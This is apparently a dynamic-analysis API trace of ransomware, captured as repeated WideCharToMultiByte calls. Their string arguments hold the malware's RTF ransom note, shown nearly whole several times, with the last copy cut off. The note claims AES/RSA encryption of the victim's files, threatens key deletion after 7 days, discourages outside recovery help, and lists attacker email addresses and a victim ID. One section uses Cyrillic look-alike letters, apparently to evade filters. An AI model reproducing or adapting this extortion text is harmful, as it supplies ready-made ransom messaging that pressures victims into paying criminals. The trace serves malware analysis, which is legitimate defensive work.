\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.237] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.237] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462808, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. 